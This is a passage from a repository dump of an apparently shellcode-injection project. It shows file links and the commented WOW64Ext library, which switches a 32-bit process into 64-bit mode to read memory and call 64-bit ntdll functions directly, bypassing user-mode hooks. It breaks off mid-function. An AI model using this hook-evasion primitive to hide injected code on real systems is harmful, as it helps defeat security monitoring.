/UnModuelInject/UnModuelInject/Release/mt.dep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/mt.dep
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/vc90.pdb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/wow64ext.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/wow64ext.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/x32ext.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/x32ext.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/UnModuelInject.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/UnModuelInject.vcproj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/UnModuelInject.vcproj.DESKTOP-AS29ISP.YYYYY.user:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/UnModuelInject.vcproj.storm-PC.storm.user:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/UnModuleInject.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/UnModuleInject.cpp
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/UnModuleInject.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/UnModuleInject.h
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Unmodule_Inject.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Unmodule_Inject.cpp
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/stdafx.cpp
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/stdafx.h
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/targetver.h
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/internal.h:
--------------------------------------------------------------------------------
1 | /**
2 | *
3 | * WOW64Ext Library
4 | *
5 | * Copyright (c) 2014 ReWolf
6 | * http://blog.rewolf.pl/
7 | *
8 | * This program is free software: you can redistribute it and/or modify
9 | * it under the terms of the GNU Lesser General Public License as published
10 | * by the Free Software Foundation, either version 3 of the License, or
11 | * (at your option) any later version.
12 | *
13 | * This program is distributed in the hope that it will be useful,
14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | * GNU Lesser General Public License for more details.
17 | *
18 | * You should have received a copy of the GNU Lesser General Public License
19 | * along with this program. If not, see <http://www.gnu.org/licenses/>.
20 | *
21 | */
22 | #pragma once
23 |
24 | #ifndef _WIN64
// Raw x86 <-> x64 mode-switch primitives for a 32-bit (WoW64) build.
// Everything is emitted as literal opcode bytes because the MSVC x86 inline
// assembler cannot encode 64-bit instructions.
//
// Security note: code placed between X64_Start() and X64_End() runs with
// CS=0x33 and can call 64-bit ntdll directly, without passing through the
// 32-bit ntdll stubs. That is what lets this library reach the 64-bit address
// space of a WoW64 process, and it is also why this construct is a well-known
// detection target; keep the amount of code executed in that window minimal.
#define EMIT(a) __asm __emit (a)

// Far-return into code segment `_cs` (0x33 = 64-bit code in a WoW64 process):
//   push _cs            ; selector for the new CS
//   call $+5            ; pushes the address of the following `add`
//   add dword [esp], 5  ; skip add (4 bytes) + retf (1 byte): the pushed
//                       ; return address now points just past this macro
//   retf                ; pops EIP and CS -> execution resumes in 64-bit mode
#define X64_Start_with_CS(_cs) \
{ \
EMIT(0x6A) EMIT(_cs) /* push _cs */ \
EMIT(0xE8) EMIT(0) EMIT(0) EMIT(0) EMIT(0) /* call $+5 */ \
EMIT(0x83) EMIT(4) EMIT(0x24) EMIT(5) /* add dword [esp], 5 */ \
EMIT(0xCB) /* retf */ \
}

// Far-return back to the 32-bit segment `_cs`, executed while still in 64-bit
// mode (so `call` pushes an 8-byte RIP):
//   call $+5                 ; pushes the 8-byte address of the `mov`
//   mov dword [rsp+4], _cs   ; overwrite the high dword with the target CS,
//                            ; turning the qword into a 32-bit far pointer
//   add dword [rsp], 0xD     ; skip mov (8) + add (4) + retf (1) = 13 bytes
//   retf                     ; pops EIP:CS -> back in 32-bit code
#define X64_End_with_CS(_cs) \
{ \
EMIT(0xE8) EMIT(0) EMIT(0) EMIT(0) EMIT(0) /* call $+5 */ \
EMIT(0xC7) EMIT(0x44) EMIT(0x24) EMIT(4) EMIT(_cs) EMIT(0) EMIT(0) EMIT(0) /* mov dword [rsp + 4], _cs */ \
EMIT(0x83) EMIT(4) EMIT(0x24) EMIT(0xD) /* add dword [rsp], 0xD */ \
EMIT(0xCB) /* retf */ \
}

// 0x33 / 0x23 are the 64-bit and 32-bit code selectors used by WoW64.
#define X64_Start() X64_Start_with_CS(0x33)
#define X64_End() X64_End_with_CS(0x23)

// x64 register numbers as used in the ModRM/REX encoding (bit 3 -> REX.B).
#define _RAX 0
#define _RCX 1
#define _RDX 2
#define _RBX 3
#define _RSP 4
#define _RBP 5
#define _RSI 6
#define _RDI 7
#define _R8 8
#define _R9 9
#define _R10 10
#define _R11 11
#define _R12 12
#define _R13 13
#define _R14 14
#define _R15 15

// 64-bit push/pop of any of the 16 GPRs: REX.W (0x48) plus REX.B for r8-r15,
// followed by the one-byte push (0x50+r) / pop (0x58+r) opcode.
#define X64_Push(r) EMIT(0x48 | ((r) >> 3)) EMIT(0x50 | ((r) & 7))
#define X64_Pop(r) EMIT(0x48 | ((r) >> 3)) EMIT(0x58 | ((r) & 7))

// Prefix the following __asm statement with REX.W so that an instruction the
// x86 assembler encodes for 32-bit operands is executed as its 64-bit form
// (e.g. `REX_W mov ecx, ...` runs as `mov rcx, ...`). Only valid while in
// 64-bit mode.
#define REX_W EMIT(0x48) __asm
67 |
// 64-bit scalar that the 32-bit inline assembler can address as two DWORDs.
// `.dw[0]` is used as the memory operand under a REX_W prefix to move the
// whole 64-bit value in one instruction; `.v` is for the C side.
//to fool M$ inline asm compiler I'm using 2 DWORDs instead of DWORD64
//use of DWORD64 will generate wrong 'pop word ptr[]' and it will break stack
union reg64
{
DWORD64 v;
DWORD dw[2];
};
75 | #endif
76 |
77 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/wow64ext.cpp:
--------------------------------------------------------------------------------
1 | /**
2 | *
3 | * WOW64Ext Library
4 | *
5 | * Copyright (c) 2014 ReWolf
6 | * http://blog.rewolf.pl/
7 | *
8 | * This program is free software: you can redistribute it and/or modify
9 | * it under the terms of the GNU Lesser General Public License as published
10 | * by the Free Software Foundation, either version 3 of the License, or
11 | * (at your option) any later version.
12 | *
13 | * This program is distributed in the hope that it will be useful,
14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | * GNU Lesser General Public License for more details.
17 | *
18 | * You should have received a copy of the GNU Lesser General Public License
19 | * along with this program. If not, see <http://www.gnu.org/licenses/>.
20 | *
21 | */
22 |
23 | #include
24 |
25 | #ifndef _WIN64
26 | #include
27 | #include
28 | #include "internal.h"
29 | #include "wow64ext.h"
30 |
31 | #pragma comment(lib, "Shlwapi.lib")
32 |
// Case-insensitive comparison of two NUL-terminated wide strings that folds
// only the ASCII range 'A'..'Z'. It is deliberately locale-independent (no
// CRT/towlower state) because it is used to match loader module names such
// as "ntdll.dll". Returns 0 when the strings are equal after folding,
// otherwise the signed difference of the first pair of folded code units
// that differ (negative when string1 sorts first).
// Both arguments must be non-NULL; there is no guard.
int _mywcsicmp(const wchar_t *string1, const wchar_t *string2)
{
    const wchar_t *lhs = string1;
    const wchar_t *rhs = string2;

    for (;;)
    {
        wchar_t a = *lhs++;
        wchar_t b = *rhs++;

        // ASCII-only fold: anything outside 'A'..'Z' is compared as-is.
        if (a >= L'A' && a <= L'Z')
            a += L'a' - L'A';
        if (b >= L'A' && b <= L'Z')
            b += L'a' - L'A';

        // Stop at the first mismatch or at the end of string1 (a == 0); in
        // the latter case b is either 0 (equal) or a non-zero tail.
        if (a != b || a == 0)
            return a - b;
    }
}
52 |
53 | #pragma warning(push)
54 | #pragma warning(disable : 4409)
// Calls the 64-bit function at `func` from 32-bit (WoW64) code using the x64
// calling convention: the first four DWORD64 arguments go in RCX, RDX, R8, R9,
// the remaining ones are pushed right-to-left above a 0x20-byte shadow area,
// and RAX is captured as the result. Only the integer return register is
// returned; floating-point arguments and results are not supported.
//
// Contract for callers:
//   - `argC` must equal the number of variadic arguments actually supplied,
//     and every one of them must be passed as a DWORD64 (cast at the call
//     site), because va_arg consumes 8-byte slots; a mismatch silently feeds
//     the callee garbage or reads past the argument list.
//   - `func` must be a valid 64-bit code address (normally a 64-bit ntdll
//     export obtained via GetProcAddress64). Nothing here validates it.
//   - The call is made with CS=0x33 directly against 64-bit code, so it does
//     not pass through the 32-bit ntdll/kernel32 stubs; user-mode hooks placed
//     there are not exercised. Treat this as the privileged primitive of the
//     library and keep its callers few.
// Returns the callee's RAX; for Nt* functions that is an NTSTATUS that
// callers compare against STATUS_SUCCESS.
/*extern "C" __declspec(dllexport) */DWORD64 __cdecl X64Call(DWORD64 func, int argC, ...)
{
va_list args;
va_start(args, argC);
// The comma expression consumes one argument per register only while argC > 0,
// so missing register arguments become 0 instead of reading past the list.
reg64 _rcx = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
reg64 _rdx = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
reg64 _r8 = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
reg64 _r9 = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
reg64 _rax = { 0 };

// Address of the first stack-argument slot (5th argument onwards). After the
// four decrements above, `argC` counts only these remaining stack arguments.
reg64 restArgs = { (DWORD64)&va_arg(args, DWORD64) };

// conversion to QWORD for easier use in inline assembly
reg64 _argC = { (DWORD64)argC };
DWORD back_esp = 0;
WORD back_fs = 0;

__asm
{
;// reset FS segment, to properly handle RFG
mov back_fs, fs
mov eax, 0x2B
mov fs, ax

;// keep original esp in back_esp variable
mov back_esp, esp

;// align esp to 0x10, without aligned stack some syscalls may return errors !
;// (actually, for syscalls it is sufficient to align to 8, but SSE opcodes
;// requires 0x10 alignment), it will be further adjusted according to the
;// number of arguments above 4
and esp, 0xFFFFFFF0

X64_Start();

;// below code is compiled as x86 inline asm, but it is executed as x64 code
;// that's why it need sometimes REX_W() macro, right column contains detailed
;// transcription how it will be interpreted by CPU

;// fill first four arguments
REX_W mov ecx, _rcx.dw[0] ;// mov rcx, qword ptr [_rcx]
REX_W mov edx, _rdx.dw[0] ;// mov rdx, qword ptr [_rdx]
push _r8.v ;// push qword ptr [_r8]
X64_Pop(_R8); ;// pop r8
push _r9.v ;// push qword ptr [_r9]
X64_Pop(_R9); ;// pop r9
;//
REX_W mov eax, _argC.dw[0] ;// mov rax, qword ptr [_argC]
;//
;// final stack adjustment, according to the ;//
;// number of arguments above 4 ;//
;// (push rdi + 8*argC + 0x20 shadow space must leave rsp 16-byte aligned
;// at the call: an odd argC already does, an even one needs 8 more bytes)
test al, 1 ;// test al, 1
jnz _no_adjust ;// jnz _no_adjust
sub esp, 8 ;// sub rsp, 8
_no_adjust: ;//
;//
push edi ;// push rdi
REX_W mov edi, restArgs.dw[0] ;// mov rdi, qword ptr [restArgs]
;//
;// put rest of arguments on the stack ;//
;// (walk the va_list backwards so the 5th argument ends up lowest) ;//
REX_W test eax, eax ;// test rax, rax
jz _ls_e ;// je _ls_e
REX_W lea edi, dword ptr [edi + 8*eax - 8] ;// lea rdi, [rdi + rax*8 - 8]
;//
_ls: ;//
REX_W test eax, eax ;// test rax, rax
jz _ls_e ;// je _ls_e
push dword ptr [edi] ;// push qword ptr [rdi]
REX_W sub edi, 8 ;// sub rdi, 8
REX_W sub eax, 1 ;// sub rax, 1
jmp _ls ;// jmp _ls
_ls_e: ;//
;//
;// create stack space for spilling registers ;//
REX_W sub esp, 0x20 ;// sub rsp, 20h
;//
call func ;// call qword ptr [func]
;//
;// cleanup stack ;//
;// (drops the shadow space and the pushed stack arguments; the optional ;//
;// 8-byte alignment pad is undone by the `mov esp, back_esp` below) ;//
REX_W mov ecx, _argC.dw[0] ;// mov rcx, qword ptr [_argC]
REX_W lea esp, dword ptr [esp + 8*ecx + 0x20] ;// lea rsp, [rsp + rcx*8 + 20h]
;//
pop edi ;// pop rdi
;//
// set return value ;//
REX_W mov _rax.dw[0], eax ;// mov qword ptr [_rax], rax

X64_End();

;// reload SS from DS and restore the original ESP now that we are back in
;// 32-bit mode (NOTE(review): the far return does not reload SS — confirm)
mov ax, ds
mov ss, ax
mov esp, back_esp

;// restore FS segment
mov ax, back_fs
mov fs, ax
}
return _rax.v;
}
154 | #pragma warning(pop)
155 |
// Copies `sz` bytes from the 64-bit virtual address `srcMem` into the 32-bit
// buffer `dstMem`, switching to the 64-bit code segment so that RSI can hold a
// full 64-bit source address. The bulk is moved as sz/4 dwords with
// `rep movsd`, followed by the 0-3 remaining bytes via movsw/movsb.
//
// Preconditions (only the NULL/zero guards below are checked):
//   - `dstMem` must be a 32-bit address: `mov edi, dstMem` zero-extends it,
//     so only low-4GB destinations are reachable.
//   - `srcMem` must be readable for `sz` bytes. There is no probe; a fault
//     here is raised while CS=0x33 — NOTE(review): do not assume the caller's
//     32-bit SEH will see it cleanly, confirm before wrapping calls in __try.
// Returns nothing; if a guard fails the destination is left untouched, which
// callers must account for (a zero `srcMem` silently copies nothing).
void getMem64(void* dstMem, DWORD64 srcMem, size_t sz)
{
if ((nullptr == dstMem) || (0 == srcMem) || (0 == sz))
return;

reg64 _src = { srcMem };

__asm
{
X64_Start();

;// below code is compiled as x86 inline asm, but it is executed as x64 code
;// that's why it need sometimes REX_W() macro, right column contains detailed
;// transcription how it will be interpreted by CPU

push edi ;// push rdi
push esi ;// push rsi
;//
mov edi, dstMem ;// mov edi, dword ptr [dstMem] ; high part of RDI is zeroed
REX_W mov esi, _src.dw[0] ;// mov rsi, qword ptr [_src]
mov ecx, sz ;// mov ecx, dword ptr [sz] ; high part of RCX is zeroed
;//
;// eax = sz % 4 (tail bytes), ecx = sz / 4 (dword count)
mov eax, ecx ;// mov eax, ecx
and eax, 3 ;// and eax, 3
shr ecx, 2 ;// shr ecx, 2
;//
rep movsd ;// rep movs dword ptr [rdi], dword ptr [rsi]
;//
;// tail: 0 -> done, 1 -> byte, 2 -> word, 3 -> word + byte
test eax, eax ;// test eax, eax
je _move_0 ;// je _move_0
cmp eax, 1 ;// cmp eax, 1
je _move_1 ;// je _move_1
;//
movsw ;// movs word ptr [rdi], word ptr [rsi]
cmp eax, 2 ;// cmp eax, 2
je _move_0 ;// je _move_0
;//
_move_1: ;//
movsb ;// movs byte ptr [rdi], byte ptr [rsi]
;//
_move_0: ;//
pop esi ;// pop rsi
pop edi ;// pop rdi

X64_End();
}
}
203 |
// Compares `sz` bytes of the 32-bit buffer `dstMem` with the 64-bit virtual
// address `srcMem`, using the same dword/word/byte split as getMem64().
// Returns true only if every byte matches. Returns false for a NULL buffer,
// a zero address or a zero length — i.e. an "empty" comparison is NOT
// considered equal, which callers such as getLdrGetProcedureAddress rely on.
// Same preconditions as getMem64(): `dstMem` must be a 32-bit address and
// `srcMem` must be readable; nothing is probed.
bool cmpMem64(void* dstMem, DWORD64 srcMem, size_t sz)
{
if ((nullptr == dstMem) || (0 == srcMem) || (0 == sz))
return false;

bool result = false;
reg64 _src = { srcMem };
__asm
{
X64_Start();

;// below code is compiled as x86 inline asm, but it is executed as x64 code
;// that's why it need sometimes REX_W() macro, right column contains detailed
;// transcription how it will be interpreted by CPU

push edi ;// push rdi
push esi ;// push rsi
;//
mov edi, dstMem ;// mov edi, dword ptr [dstMem] ; high part of RDI is zeroed
REX_W mov esi, _src.dw[0] ;// mov rsi, qword ptr [_src]
mov ecx, sz ;// mov ecx, dword ptr [sz] ; high part of RCX is zeroed
;//
;// eax = sz % 4 (tail bytes), ecx = sz / 4 (dword count)
mov eax, ecx ;// mov eax, ecx
and eax, 3 ;// and eax, 3
shr ecx, 2 ;// shr ecx, 2
;//
;// when ecx is 0 the rep does not run and ZF stays set from the shr above,
;// so the jnz below correctly falls through for sizes < 4
repe cmpsd ;// repe cmps dword ptr [rsi], dword ptr [rdi]
jnz _ret_false ;// jnz _ret_false
;//
test eax, eax ;// test eax, eax
je _move_0 ;// je _move_0
cmp eax, 1 ;// cmp eax, 1
je _move_1 ;// je _move_1
;//
cmpsw ;// cmps word ptr [rsi], word ptr [rdi]
jnz _ret_false ;// jnz _ret_false
cmp eax, 2 ;// cmp eax, 2
je _move_0 ;// je _move_0
;//
_move_1: ;//
cmpsb ;// cmps byte ptr [rsi], byte ptr [rdi]
jnz _ret_false ;// jnz _ret_false
;//
_move_0: ;//
mov result, 1 ;// mov byte ptr [result], 1
;//
_ret_false: ;//
pop esi ;// pop rsi
pop edi ;// pop rdi

X64_End();
}

return result;
}
259 |
// Returns the address of the 64-bit TEB of the current thread, or whatever
// R12 holds if the assumption below does not hold.
// Relies on the undocumented WoW64 convention (original author's note) that
// R12 carries the TEB64 pointer while executing in 64-bit mode. NOTE(review):
// this is not a contract of the OS and should be re-validated on every target
// Windows build; GetModuleHandle64 dereferences the result.
DWORD64 getTEB64()
{
reg64 reg;
reg.v = 0;

X64_Start();
// R12 register should always contain pointer to TEB64 in WoW64 processes
X64_Push(_R12);
// below pop will pop QWORD from stack, as we're in x64 mode now
__asm pop reg.dw[0]
X64_End();

return reg.v;
}
274 |
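// 64-bit counterpart of GetModuleHandleW(): walks the 64-bit loader's
// InLoadOrderModuleList (reached via TEB64 -> PEB64 -> PEB_LDR_DATA64) and
// returns the DllBase of the first entry whose BaseDllName equals
// `lpModuleName` (ASCII case-insensitive, see _mywcsicmp). Returns 0 when the
// module is not loaded or any loader structure cannot be read. Passing NULL
// returns the 64-bit image base recorded in PEB64, mirroring the Win32
// convention. Only the 64-bit module list is searched; the 32-bit modules of
// this WoW64 process are not visible here.
//
// Hardening compared to a naive walk:
//   - the TEB/PEB/Ldr pointers are checked before use — getMem64() silently
//     does nothing for a zero source, which would otherwise leave the local
//     structs uninitialised and the walk following garbage links;
//   - an empty list is handled without treating the list head as an entry;
//   - the module name is copied by its Length and explicitly NUL-terminated
//     instead of trusting MaximumLength, which may be 0 (malloc(0) followed by
//     an out-of-bounds read) or describe a buffer without a terminator.
/*extern "C" __declspec(dllexport) */DWORD64 __cdecl GetModuleHandle64(wchar_t* lpModuleName)
{
    DWORD64 tebAddr = getTEB64();
    if (0 == tebAddr)
        return 0;

    TEB64 teb64;
    memset(&teb64, 0, sizeof(teb64));
    getMem64(&teb64, tebAddr, sizeof(TEB64));
    if (0 == teb64.ProcessEnvironmentBlock)
        return 0;

    PEB64 peb64;
    memset(&peb64, 0, sizeof(peb64));
    getMem64(&peb64, teb64.ProcessEnvironmentBlock, sizeof(PEB64));
    if (nullptr == lpModuleName)
        return peb64.ImageBaseAddress;
    if (0 == peb64.Ldr)
        return 0;

    PEB_LDR_DATA64 ldr;
    memset(&ldr, 0, sizeof(ldr));
    getMem64(&ldr, peb64.Ldr, sizeof(PEB_LDR_DATA64));

    // The list is circular and terminates back at the list head embedded in
    // PEB_LDR_DATA64, which is not itself a module entry.
    const DWORD64 listHead = peb64.Ldr + offsetof(PEB_LDR_DATA64, InLoadOrderModuleList);
    DWORD64 cursor = ldr.InLoadOrderModuleList.Flink;

    while (0 != cursor && cursor != listHead)
    {
        LDR_DATA_TABLE_ENTRY64 entry;
        memset(&entry, 0, sizeof(entry));
        getMem64(&entry, cursor, sizeof(LDR_DATA_TABLE_ENTRY64));
        cursor = entry.InLoadOrderLinks.Flink;

        // Length is the byte count of the name without terminator; entries
        // without a name cannot match and are skipped rather than compared.
        const WORD nameBytes = entry.BaseDllName.Length;
        if (0 == nameBytes || 0 == entry.BaseDllName.Buffer)
            continue;

        // One extra wchar_t (zeroed) guarantees NUL termination for _mywcsicmp.
        wchar_t* name = (wchar_t*)malloc(nameBytes + sizeof(wchar_t));
        if (nullptr == name)
            return 0;
        memset(name, 0, nameBytes + sizeof(wchar_t));
        getMem64(name, entry.BaseDllName.Buffer, nameBytes);

        const bool match = (0 == _mywcsicmp(lpModuleName, name));
        free(name);
        if (match)
            return entry.DllBase;
    }

    return 0;
}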
312 |
// Returns the base address of the 64-bit ntdll.dll mapped into this WoW64
// process, resolved once through the 64-bit loader list and then cached in a
// static. 0 means the lookup failed; because only a non-zero result is
// cached, a failed lookup is retried on the next call. The cache is written
// without synchronisation, which is benign: every writer stores the same value.
DWORD64 getNTDLL64()
{
    static DWORD64 cachedNtdll64Base = 0;

    if (0 == cachedNtdll64Base)
        cachedNtdll64Base = GetModuleHandle64(L"ntdll.dll");

    return cachedNtdll64Base;
}
322 |
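// Locates the 64-bit ntdll export "LdrGetProcedureAddress" by parsing the
// export directory of the 64-bit ntdll image mapped into this WoW64 process,
// reading every header through getMem64()/cmpMem64() because the 32-bit
// loader and GetProcAddress() know nothing about that image.
// Returns the absolute 64-bit address of the export, or 0 if ntdll64 cannot
// be found, the headers do not look like a PE32+ image, or the name is absent.
//
// Bug fixed here: the name and ordinal tables have NumberOfNames entries while
// the address table has NumberOfFunctions entries. The lookup loop previously
// iterated to NumberOfFunctions over nameTable/ordTable, reading past their
// allocations whenever NumberOfFunctions > NumberOfNames, and indexed
// rvaTable with an unchecked ordinal. Header signatures and table sizes are
// now validated before any offset derived from them is dereferenced.
DWORD64 getLdrGetProcedureAddress()
{
    DWORD64 modBase = getNTDLL64();
    if (0 == modBase)
        return 0;

    IMAGE_DOS_HEADER idh;
    memset(&idh, 0, sizeof(idh));
    getMem64(&idh, modBase, sizeof(idh));
    if (IMAGE_DOS_SIGNATURE != idh.e_magic || idh.e_lfanew <= 0)
        return 0;

    IMAGE_NT_HEADERS64 inh;
    memset(&inh, 0, sizeof(inh));
    getMem64(&inh, modBase + idh.e_lfanew, sizeof(IMAGE_NT_HEADERS64));
    if (IMAGE_NT_SIGNATURE != inh.Signature
        || IMAGE_NT_OPTIONAL_HDR64_MAGIC != inh.OptionalHeader.Magic
        || inh.OptionalHeader.NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_EXPORT)
        return 0;

    IMAGE_DATA_DIRECTORY& idd = inh.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (0 == idd.VirtualAddress || idd.Size < sizeof(IMAGE_EXPORT_DIRECTORY))
        return 0;

    IMAGE_EXPORT_DIRECTORY ied;
    memset(&ied, 0, sizeof(ied));
    getMem64(&ied, modBase + idd.VirtualAddress, sizeof(ied));

    // Ordinals are 16-bit indices into the address table, so more than 0x10000
    // entries means a corrupt header. The cap also keeps the byte counts below
    // from overflowing a 32-bit size_t.
    if (0 == ied.NumberOfFunctions || ied.NumberOfFunctions > 0x10000
        || 0 == ied.NumberOfNames || ied.NumberOfNames > 0x10000)
        return 0;

    const size_t rvaBytes = sizeof(DWORD) * ied.NumberOfFunctions;
    const size_t ordBytes = sizeof(WORD) * ied.NumberOfNames;
    const size_t nameBytes = sizeof(DWORD) * ied.NumberOfNames;

    DWORD* rvaTable = (DWORD*)malloc(rvaBytes);
    WORD* ordTable = (WORD*)malloc(ordBytes);
    DWORD* nameTable = (DWORD*)malloc(nameBytes);

    DWORD64 dw64 = 0;
    if (nullptr != rvaTable && nullptr != ordTable && nullptr != nameTable)
    {
        memset(rvaTable, 0, rvaBytes);
        memset(ordTable, 0, ordBytes);
        memset(nameTable, 0, nameBytes);
        getMem64(rvaTable, modBase + ied.AddressOfFunctions, rvaBytes);
        getMem64(ordTable, modBase + ied.AddressOfNameOrdinals, ordBytes);
        getMem64(nameTable, modBase + ied.AddressOfNames, nameBytes);

        // Compared including the terminating NUL (sizeof), so a longer export
        // sharing this prefix cannot match.
        char target[] = "LdrGetProcedureAddress";

        // lazy search, there is no need to use binsearch for just one function
        for (DWORD i = 0; i < ied.NumberOfNames; i++)
        {
            if (!cmpMem64(target, modBase + nameTable[i], sizeof(target)))
                continue;

            // ordTable[i] is the index into the address table for name i.
            const WORD ordinal = ordTable[i];
            if (ordinal < ied.NumberOfFunctions)
                dw64 = modBase + rvaTable[ordinal];
            break;
        }
    }

    // free(NULL) is a no-op, so a partially failed allocation is cleaned up too.
    free(rvaTable);
    free(ordTable);
    free(nameTable);

    return dw64;
}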
390 |
// Translates the NTSTATUS returned by an X64Call()'d Nt* function into a Win32
// error code and stores it as the calling thread's last error, so callers of
// the *64 wrappers can use GetLastError() as they would with the Win32 API.
// The two Rtl helpers are resolved once from the 32-bit ntdll (via the normal
// Win32 loader, not the 64-bit one) and cached in statics. If either cannot be
// resolved the call is a silent no-op. Only the low 32 bits of `status` are
// used, which is the full width of an NTSTATUS.
/*extern "C" __declspec(dllexport) */VOID __cdecl SetLastErrorFromX64Call(DWORD64 status)
{
    typedef ULONG (WINAPI *RtlNtStatusToDosError_t)(NTSTATUS Status);
    typedef ULONG (WINAPI *RtlSetLastWin32Error_t)(NTSTATUS Status);

    static RtlNtStatusToDosError_t pfnNtStatusToDosError = nullptr;
    static RtlSetLastWin32Error_t pfnSetLastWin32Error = nullptr;

    const bool needResolve = (nullptr == pfnNtStatusToDosError) || (nullptr == pfnSetLastWin32Error);
    if (needResolve)
    {
        HMODULE ntdll32 = GetModuleHandleW(L"ntdll.dll");
        pfnNtStatusToDosError = (RtlNtStatusToDosError_t)GetProcAddress(ntdll32, "RtlNtStatusToDosError");
        pfnSetLastWin32Error = (RtlSetLastWin32Error_t)GetProcAddress(ntdll32, "RtlSetLastWin32Error");
    }

    if ((nullptr == pfnNtStatusToDosError) || (nullptr == pfnSetLastWin32Error))
        return;

    pfnSetLastWin32Error(pfnNtStatusToDosError((DWORD)status));
}
411 |
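// 64-bit counterpart of GetProcAddress(): asks the 64-bit ntdll's
// LdrGetProcedureAddress for the export `funcName` of the 64-bit module
// `hModule`. Returns the 64-bit address of the export, or 0 when the helper
// cannot be located, the inputs are invalid, or the lookup fails — in the
// last case the NTSTATUS is mapped into the thread's last error, consistent
// with the other *64 wrappers in this file.
//
// Input checks added: a NULL or empty `funcName` previously crashed in
// strlen() or produced a zero-length name; a name longer than 0xFFFE bytes
// would have wrapped the 16-bit Length/MaximumLength fields.
/*extern "C" __declspec(dllexport) */DWORD64 __cdecl GetProcAddress64(DWORD64 hModule, char* funcName)
{
    static DWORD64 _LdrGetProcedureAddress = 0;
    if (0 == _LdrGetProcedureAddress)
    {
        _LdrGetProcedureAddress = getLdrGetProcedureAddress();
        if (0 == _LdrGetProcedureAddress)
            return 0;
    }

    if (0 == hModule || nullptr == funcName)
        return 0;

    const size_t nameLen = strlen(funcName);
    if (0 == nameLen || nameLen > 0xFFFE)
        return 0;

    // LdrGetProcedureAddress takes a PANSI_STRING. The 64-bit UNICODE_STRING
    // template has the identical layout (USHORT Length, USHORT MaximumLength,
    // padding to 8, 64-bit Buffer), so it is reused with the 32-bit buffer
    // address zero-extended into Buffer. Length is a byte count.
    _UNICODE_STRING_T<DWORD64> fName = { 0 };
    fName.Buffer = (DWORD64)funcName;
    fName.Length = (WORD)nameLen;
    fName.MaximumLength = (WORD)(nameLen + 1);

    DWORD64 funcRet = 0;
    const DWORD64 status = X64Call(_LdrGetProcedureAddress, 4,
        (DWORD64)hModule, (DWORD64)&fName, (DWORD64)0, (DWORD64)&funcRet);
    if (STATUS_SUCCESS != status)
    {
        SetLastErrorFromX64Call(status);
        return 0;
    }
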